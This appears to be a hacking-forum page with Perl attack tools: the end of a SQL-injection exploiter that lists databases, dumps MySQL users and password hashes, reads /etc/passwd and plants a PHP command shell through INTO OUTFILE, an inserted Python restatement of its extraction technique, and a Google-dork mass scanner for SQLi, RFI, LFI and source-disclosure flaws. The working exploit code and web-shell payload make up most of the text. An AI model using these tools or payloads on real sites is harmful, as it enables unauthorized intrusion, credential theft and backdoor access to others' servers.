$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page."1".$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}

sub ascii {
return join ',',unpack "U*",$_[0];
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}

sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n";
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}
}
}
}

sub menu_options {
print "[Target confirmed] : $_[0]\n";
print "[Bypass] : $_[1]\n\n";

my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "[save] : /logs/webs/$save\n\n";
print "\n\n--== information_schema.tables ==--\n\n";
print "[1] : Show tables\n";
print "[2] : Show columns\n";
print "[3] : Show DBS\n";
print "[4] : Show tables with other DB\n";
print "[5] : Show columns with other DB\n";
print "\n\n--== mysql.user ==--\n\n";
print "[6] : Show users\n";
print "\n\n--== Others ==--\n\n";
print "[7] : Fuzzing tables\n";
print "[8] : Fuzzing columns\n";
print "[9] : Fuzzing files with load_file\n";
print "[10] : Dump\n";
print "[11] : Informacion of the server\n";
print "[12] : Create a shell with into outfile\n";
print "[13] : Show Log\n";
print "[14] : Change Target\n";
print "[15] : Exit\n";
print "\n\n[Option] : ";
chomp(my $opcion = <STDIN>);
if ($opcion eq "1") {
schematables($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "2") {
print "\n\n[Tabla] : ";
chomp(my $tabla = <STDIN>);
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($opcion eq "3") {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "4") {
print "\n\n[DAtabase] : ";
chomp(my $data =<STDIN>);
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($opcion eq "5"){
print "\n\n[DB] : ";
chomp(my $db =<STDIN>);
print "\n[Table] : ";
chomp(my $table =<STDIN>);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($opcion eq "6") {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "13") {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($opcion eq "15") {
&finish;
}
elsif ($opcion eq "14") {
&head;
&menu;
}
elsif ($opcion eq "7") {
&tabfuzz($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "8") {
print "\n\n[Tabla] : ";
chomp(my $tab  = <STDIN>);
&colfuzz($_[0],$_[1],$tab,$save);
&reload;
}
elsif ($opcion eq "9") {
&load($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "10") {
print "\n\n[Table to dump] : ";
chomp(my $tabla = <STDIN>);
print "\n[Column 1] : ";
chomp(my $col1 = <STDIN>);
print "\n[Column 2] : ";
chomp(my $col2 = <STDIN>);
print "\n\n";
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($opcion eq "11") {
print "\n\n";
&details($_[0],$_[1],$save);
&reload;
}
elsif ($opcion eq "12") {
print "\n\n[Full Path Disclosure] : ";
chomp(my $path = <STDIN>);
&into($_[0],$_[1],$path,$save);
&reload;
}
else {
&reload;
}
}

sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $resto = $1;
$total = $resto - 17;
print "[+] Tables Length :  $total\n\n";
savefile($save.".txt","[+] Searching tables with schema\n");
savefile($save.".txt","[+] Tables Length :  $total\n");
my $limit = $1;
for my $limit(17..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
print "[Table $real Found : $table ]\n";
savefile($save.".txt","[Table $real Found : $table ]");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}
}
sub reload {
print "\n\n[+] Finish\n\n";
<STDIN>;
&head;
&menu_options;
}


sub schemacolumns {
my ($page,$bypass,$save,$table) = @_;
my $page3 = $page;
my $page4 = $page;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
print "\n[DB] : default\n";
savefile($save.".txt","[DB] : default");
savefile($save.".txt","[Table] : $table\n");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns Length : $1 ]\n\n";
savefile($save.".txt","[Columns Length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemadb {
my ($page,$bypass,$save) = @_;
my $page1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Searching DBS\n\n";
($pass1,$pass2) = &bypass($bypass);
$page=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page.$pass1."from".$pass1."information_schema.schemata");
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $limita = $1;
print "[+] Databases Length : $limita\n\n";
savefile($save.".txt","[+] Databases Length : $limita\n");
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),schema_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit(0..$limita) {
$code = toma($page1.$pass1."from".$pass1."information_schema.schemata".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $control = $1;
if ($control ne "information_schema" and $control ne "mysql" and $control ne "phpmyadmin") {
print "[Database $real Found] $control\n";
savefile($save.".txt","[Database $real Found] : $control");
$real++;
}
}
}
} else {
print "[-] information_schema = ERROR\n";
}
}

sub schematablesdb {
my $page = $_[0];
my $db = $_[2];
my $page1 = $page;
savefile($_[3].".txt","\n");
print "\n\n[+] Searching tables with DB $db\n\n";
($pass1,$pass2) = &bypass($_[1]);
savefile($_[3].".txt","[DB] : $db");
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass2."\n";
if ($code=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) { 
print "[+] Tables Length :  $1\n\n";
savefile($_[3].".txt","[+] Tables Length :  $1\n");
my $limit = $1;
$real = "1";
for my $lim(0..$limit) {
$code1 = toma($page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2);
#print $page.$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$lim.",1".$pass2."\n";
if ($code1 =~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
my $table = $1;
chomp $table;
savefile($_[3].".txt","[Table $real Found : $table ]");
print "[Table $real Found : $table ]\n";
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub schemacolumnsdb {
my ($page,$bypass,$db,$table,$save) = @_;
my $page3 = $page;
my $page4 = $page;
print "\n\n[+] Searching columns in table $table with DB $db\n\n";
savefile($save.".txt","\n");
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","\n[DB] : $db");
savefile($save.".txt","[Table] : $table");
$page3=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code3 = toma($page3.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass2);
if ($code3=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n[Columns length : $1 ]\n\n";
savefile($save.".txt","[Columns length : $1 ]\n");
my $si = $1;
chomp $si;
$page4=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),column_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$real = "1";
for my $limit2(0..$si) {
$code4 = toma($page4.$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name=char(".ascii($table).")".$pass1."and".$pass1."table_schema=char(".ascii($db).")".$pass1."limit".$pass1.$limit2.",1".$pass2);
if ($code4=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "[Column $real] : $1\n";
savefile($save.".txt","[Column $real] : $1");
$real++;
}}
} else {
print "\n[-] information_schema = ERROR\n";
}}

sub mysqluser {
my ($page,$bypass,$save) = @_;
my $cop = $page;
my $cop1 = $page;
savefile($save.".txt","\n");
print "\n\n[+] Finding mysql.users\n";
($pass1,$pass2) = &bypass($bypass);
$page =~s/hackman/concat(char(82,65,84,83,88,80,68,79,87,78,49))/;
$code = toma($page.$pass1."from".$pass1."mysql.user".$pass2);
if ($code=~/RATSXPDOWN/ig){
$cop1 =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code1 = toma($cop1.$pass1."from".$pass1."mysql.user".$pass2);
if ($code1=~/RATSXPDOWN1(.*)RATSXPDOWN1/ig) {
print "\n\n[+] Users Found : $1\n\n";
savefile($save.".txt","\n[+] Users mysql Found : $1\n");
for my $limit(0..$1) {
$cop =~s/hackman/unhex(hex(concat(0x524154535850444f574e,Host,0x524154535850444f574e,User,0x524154535850444f574e,Password,0x524154535850444f574e)))/;
$code = toma($cop.$pass1."from".$pass1."mysql.user".$pass1."limit".$pass1.$limit.",1".$pass2);
if ($code=~/RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN(.*)RATSXPDOWN/ig) {
print "[Host] : $1 [User] : $2 [Password] : $3\n";
savefile($save.".txt","[Host] : $1 [User] : $2 [Password] : $3");
} else {
&reload;
}}}
} else {
print "\n[-] mysql.user = ERROR\n";
}}

sub tabfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[2].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/g) {
my $start = $1; my $end = $2;
print "\n\n[+] Searching tables.....\n\n";
for my $table(@buscar2) {
chomp $table;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))";
$injection = $start.$concat.$end.$pass1."from".$pass1.$table.$pass2;
$code = toma($injection);
if ($code =~/ERTOR854/g) {
$count++;
print "[Table Found] : $table\n";
savefile($_[2].".txt","[Table Found] : $table");
}}}
if ($count eq "0") { print "[-] Not found any table\n";
&reload;
}
}

sub colfuzz {
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$count = "0";
savefile($_[3].".txt","\n");
print "\n";
if ($_[0] =~/(.*)hackman(.*)/) {
my $start = $1; my $end = $2;
print "[+] Searching columns for the table $_[2]...\n\n";
savefile($_[3].".txt","[Table] : $_[2]");
for my $columns(@buscar1) {
chomp $columns;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$columns,char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass1."from".$pass1.$_[2].$pass2);
if ($code =~/ERTOR854/g) {
print "[Column] : $columns\n";
savefile($_[3].".txt","[Column Found] : $columns");
}}
} else {
print "\n[Example] : $0 http://127.0.0.1/tester/sql.php?id=-1+union+select+hackman,2,3 hackers\n\n"; &copyright;
}
}

sub load {
savefile($_[2].".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($_[1]);
if ($_[0] =~/(.*)hackman(.*)/g) {
print "\n[+] Searching files with load_file...\n\n\n";
my $start = $1; my $end = $2;
for my $file(@buscar3) {
chomp $file;
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(".encode($file)."),char(69,82,84,79,82,56,53,52))))";
$code = toma($start.$concat.$end.$pass2);
if ($code =~/ERTOR854(.*)ERTOR854/g) {
print "[File Found] : $file\n";
print "\n[Source Start]\n\n";
print $1;
print "\n\n[Source End]\n\n";
savefile($_[2].".txt","[File Found] : $file");
savefile($_[2].".txt","\n[Source Start]\n");
savefile($_[2].".txt","$1");
savefile($_[2].".txt","\n[Source End]\n");
}}}}

sub dump {
savefile($_[5].".txt","\n");
print "\n";
my $page = $_[0];
($pass1,$pass2) = &bypass($_[4]);
if ($page=~/(.*)hackman(.*)/){
my $start = $1;
my $end = $2;
print "[+] Extracting values...\n\n";
$concatx = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),count($_[1]),char(69,82,84,79,82,56,53,52))))";
$val_code = toma($start.$concatx.$end.$pass1."from".$pass1.$_[3].$pass2);
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),$_[1],char(69,82,84,79,82,56,53,52),$_[2],char(69,82,84,79,82,56,53,52))))";
if ($val_code=~/ERTOR854(.*)ERTOR854/ig) {
$tota = $1;
print "[+] Table : $_[3]\n";
print "[+] Length of the rows : $tota\n\n";
print "[$_[1]] [$_[2]]\n\n";
savefile($_[5].".txt","[Table] : $_[3]");
savefile($_[5].".txt","[+] Length of the rows: $tota\n");
savefile($_[5].".txt","[$_[1]] [$_[2]]\n");
for my $limit(0..$tota) {
chomp $limit;
$injection = toma($start.$concat.$end.$pass1."from".$pass1.$_[3].$pass1."limit".$pass1.$limit.",1".$pass2);
if ($injection=~/ERTOR854(.*)ERTOR854(.*)ERTOR854/ig) {
savefile($_[5].".txt","[$_[1]] : $1   [$_[2]] : $2");
print "[$_[1]] : $1   [$_[2]] : $2\n";
} else {
print "\n\n[+] Extracting Finish\n";
&reload;
}
}
} else {
print "[-] Not Found any DATA\n\n";
}}}

sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub finish {
&copyright;
<STDIN>;
exit(1);
}


sub into {
print "\n\n[Status] : Injecting a SQLI for create a shell\n\n";
my ($page,$bypass,$dir,$save) = @_;
savefile($save.".txt","\n");
print "\n";
($pass1,$pass2) = &bypass($bypass);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
if ($path=~/\/(.*)$/) {
my $path1 = $1;
my $path2 = $path1;
$path2 =~s/$1//;
$dir =~s/$path1//ig;
$shell = $dir."/"."shell.php";
if ($page =~/(.*)hackman(.*)/ig) {
my  ($start,$end) = ($1,$2);
$code = toma($start."0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e".$end.$pass1."into".$pass1."outfile".$pass1."'".$shell."'".$pass2);
$code1 = toma("http://".$auth."/".$path2."/"."shell.php");
if ($code1=~/Mini Shell By Doddy/ig) {
print "[shell up] : http://".$auth."/".$path2."/"."shell.php"."\a\a";
savefile($save.".txt","[shell up] : http://".$auth."/".$path2."/"."shell.php");
} else {
print "[shell] : Not Found\n";
}
}
}
}

#blog : doddy-hackman.blogspot.com
#contact : lepuke[at]hotmail[Com]
#The end
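The functions above all rely on one pattern: replace the `hackman` placeholder column with `unhex(hex(concat(char(...),expr,char(...))))`, where the `char()` lists spell the marker `RATSXPDOWN1`, then pull whatever lands between the two markers out of the HTML, first for `Count(*)` and then once per row with `limit i,1`. The Python below is an added example that restates that technique in a testable form; it is not part of the original post. The placeholder name and the marker are taken from the tool; `build_query`'s `sep`/`comment` arguments stand in for the tool's `bypass()` pair; `fake_target`, `FAKE_TABLES` and the `target.invalid` URL are constructed stand-ins, not a real host or page.

```python
import re

# Marker the tool wraps every extracted value in; the original emits it as
# char(82,65,84,83,88,80,68,79,87,78,49) so that the payload needs no quotes.
MARK = "RATSXPDOWN1"
PLACEHOLDER = "hackman"   # the tool's name for the column that the page reflects


def mysql_char(s: str) -> str:
    """Render a string as a MySQL char(...) list (what the tool's ascii() helper does)."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def mysql_hex(s: str) -> str:
    """0x... hex literal, the equivalent of the tool's encode() helper used with load_file()."""
    return "0x" + s.encode().hex()


def wrap(expr: str) -> str:
    """unhex(hex(concat(MARK, expr, MARK))): forces a string result and delimits it."""
    return f"unhex(hex(concat({mysql_char(MARK)},{expr},{mysql_char(MARK)})))"


def build_query(template: str, expr: str, tail: str, sep: str = "+", comment: str = "--") -> str:
    """Substitute the placeholder column and append the FROM/WHERE/LIMIT clause.

    `sep` joins the clause words and `comment` closes the statement, the roles
    the tool's bypass() pair ($pass1/$pass2) plays.
    """
    if PLACEHOLDER not in template:
        raise ValueError("template has no placeholder column")
    return template.replace(PLACEHOLDER, wrap(expr)) + sep + tail.replace(" ", sep) + comment


def extract(body: str):
    """Return the first MARK-delimited value in a response body, or None if nothing reflected."""
    m = re.search(re.escape(MARK) + r"(.*?)" + re.escape(MARK), body, re.S)
    return m.group(1) if m else None


def enumerate_rows(fetch, template: str, expr: str, from_clause: str):
    """The count-then-LIMIT walk of schematables()/dump(): one request for Count(*),
    then one request per row with `limit i,1`. `fetch(url)` returns the response body."""
    count = extract(fetch(build_query(template, "Count(*)", from_clause)))
    if count is None or not count.strip().isdigit():
        return None          # marker did not reflect: no injection on this column
    rows = []
    for i in range(int(count)):
        value = extract(fetch(build_query(template, expr, f"{from_clause} limit {i},1")))
        if value is not None:
            rows.append(value)
    return rows


# Constructed stand-in for a vulnerable page (hypothetical, not a real host): it
# echoes the injected column the way a page with a UNION-able query would.
FAKE_TABLES = ["users", "posts", "sessions"]


def fake_target(url: str) -> str:
    if "Count(*)" in url:
        value = str(len(FAKE_TABLES))
    else:
        m = re.search(r"limit\+(\d+),1", url)
        value = FAKE_TABLES[int(m.group(1))] if m else ""
    return f"<html><body><h1>Item</h1><p>{MARK}{value}{MARK}</p></body></html>"


if __name__ == "__main__":
    tpl = "http://target.invalid/sql.php?id=-1+union+select+hackman,2,3"
    print(enumerate_rows(fake_target, tpl, "table_name", "from information_schema.tables"))
```

Two differences from the Perl are deliberate: the walk starts at row 0 instead of the hard-coded offset of 17 that `schematables()` uses to skip rows owned by `information_schema`, and the regex is non-greedy so a page that reflects the value twice does not swallow everything in between. The whole technique depends on the application echoing the injected column back; a query built with bound parameters leaves nothing for the placeholder to replace.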

#373
Scripting / [Perl] G00gl3nator By Doddy H
10 October 2011, 16:52 PM
Well, this is the graphical version of the scanner; the program can scan for:

  • SQLI
  • RFI
  • LFI
  • Full Source Disclosure

    You can also search Google for a string; the results are saved in a folder the program creates when it runs.

    Code (perl):
    #!usr/bin/perl
    #Googlenator (C) Doddy Hackman 2011

    use Tk;
    use Tk::ROText;
    use Tk::FileSelect;
    use URI::Split qw(uri_split);
    use Cwd;
    use WWW::Mechanize;

    if ($^O eq 'MSWin32') {
    use Win32::Console;
    Win32::Console::Free();
    }

    my $nave = WWW::Mechanize->new(autocheck => 0);
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12");

    installer();

    my $new = MainWindow->new(-background=>"black");

    $new->title("Googlenator (C) Doddy Hackman 2011");
    $new->geometry("780x530");
    $new->resizable(0,0);

    $d = $new->Frame(-relief=>"sunken",-bd=>1,-background=>"black",-foreground=>"cyan");
    my $scanx = $d->Menubutton(-text=>"Scan",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    my $logsx = $d->Menubutton(-text=>"Logs",-underline=>1,-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan")->pack(-side=>"left");
    $d->pack(-side=>"top",-fill=>"x");

    $scanx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadsql);
    $scanx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadrfi);
    $scanx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadlfi);
    $scanx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfsd);

    $logsx->command(-label=>"GoogleSearchs",-background=>"black",-foreground=>"cyan",-command=>\&loadgoogle);
    $logsx->command(-label=>"SQL",-background=>"black",-foreground=>"cyan",-command=>\&loadfilesql);
    $logsx->command(-label=>"RFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilerfi);
    $logsx->command(-label=>"LFI",-background=>"black",-foreground=>"cyan",-command=>\&loadfilelfi);
    $logsx->command(-label=>"FSD",-background=>"black",-foreground=>"cyan",-command=>\&loadfilefsd);

    my $box = $new->ROText(-background=>"black",-foreground=>"cyan",-width=> 104,-height=> 20)->place(-x =>20,-y=>60);
    head();

    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Google : ",-font=>"Impact")->place(-y=>"380",-x=>"20");

    my $google = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"30",-text=>"www.google.com.ar")->place(-x=>"80",-y=>"385");

    $new->Label(-background=>"black",-foreground=>"cyan",-text=>"Pages : ",-font=>"Impact")->place(-y=>"380",-x=>"300");

    my $pages = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"5",-text=>"30")->place(-y=>"385",-x=>"354");

    $new->Label(-background=>"black",-foreground=>"cyan",-font=>"Impact",-text=>"Dorks : ")->place(-y=>"380",-x=>"450");

    my $dorks = $new->Entry(-background=>"black",-foreground=>"cyan",-width=>"40",-text=>"index.php+id")->place(-y=>"385",-x=>"505");

    $new->Button(-text=>"Search in Google",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&googler)->place(-y=>"450");
    $new->Button(-text=>"About",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&about)->place(-y=>"474");
    $new->Button(-text=>"Exit",-background=>"black",-foreground=>"cyan",-activeforeground=>"cyan",-width=>"130",-command=>\&exitx)->place(-y=>"498");

    MainLoop;

    head();

    sub googler {

    my $google = $google->get;
    my $pages = $pages->get;
    my $dorks = $dorks->get;

    head();

    $box->insert("end","\t\t[+] Searching pages with string $dorks\n\n");

    my @webas = google($google,$dorks,$pages);

    $box->insert("end","\t\t[+] Cleaning\n\n");
    $box->insert("end","\t\t[+] Webs Found ".int(@webas)."\n\n");

    for(@webas) {
    $new->update();
    $box->insert("end","\t\t[Link] : ".$_."\n");
    savefile($dorks.".txt",$_);
    }

    $box->insert("end","\n\t\t[+] All save in logs/search/".$dorks."\n");
    $box->insert("end","\t\t[+] Finished\n\n");

    }

    sub loadsql {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scansql($page);
    }

    sub scansql {
    my ($pass1,$pass2) = ("+","--");
    my $page = shift;
    $code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
    if ($code1=~/The used SELECT statements have a different number of columns/ig) {
    $box->insert("end","\t\t[+] SQLI : $page\n");
    savefilevul("sql-logs.txt",$page);
    }}}

    sub loadrfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanrfi($page);
    }

    sub scanrfi {
    my $page = shift;
    $code1 = toma($page."http:/www.supertangas.com/");
    if ($code1=~/Los mejores TANGAS de la red/ig) { #This is real knowledge xDDD
    $box->insert("end","\t\t[+] RFI : $page\n");
    savefilevul("rfi-logs.txt",$page);
    }}}

    sub loadlfi {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanlfi($page);
    }


    sub scanlfi {
    my $page = shift;
    $code1 = toma($page."'");
    if ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
    $box->insert("end","\t\t[+] LFI : $page\n");
    savefilevul("lfi-logs.txt",$page);
    }}}

    sub loadfsd {

    $browse = $new->FileSelect(-directory => "/");
    my $filea = $browse->Show;

    head();
    $box->insert("end","\t\t[+] File : $filea\n");

    open (FILE,$filea);
    @words = <FILE>;
    close FILE;

    chomp @words;

    $box->insert("end","\t\t[+] Webs Found : ".int(@words)."\n\n");

    for my $page(@words) {
    my $page = clean($page);
    $new->update();
    scanfsd($page);
    }

    sub scanfsd {
    my $page = shift;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($page);
    if ($path=~/\/(.*)$/) {
    my $me = $1;
    $code1 = toma($page.$me);
    if ($code1=~/header\((.*)Content-Disposition: attachment;/ig) {
    $box->insert("end","\t\t[+] Full Source Discloure : $page\n");
    savefilevul("fsd-logs.txt",$page);
    }}}}

    sub head {

    $box->delete("0.0","end");

    $box->insert("end","
               @@@@     @@@      @@@      @@@@   @@   @@@@ @@   @@    @@   @@@@@@  @@@    @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@@  @@    @@     @@   @@@@@   @@ @@
             @@@      @@   @@  @@   @@  @@@      @@   @@   @@@@ @@   @@@@    @@  @@   @@  @@ @@
             @@  @@@  @@   @@  @@   @@  @@  @@@  @@   @@@@ @@ @ @@   @  @    @@  @@   @@  @@@@ 
             @@@  @@  @@   @@  @@   @@  @@@  @@  @@   @@   @@ @@@@  @@@@@@   @@  @@   @@  @@@@ 
              @@@@@    @@@@@    @@@@@    @@@@@   @@   @@   @@  @@@  @@  @@   @@   @@@@@   @@ @@
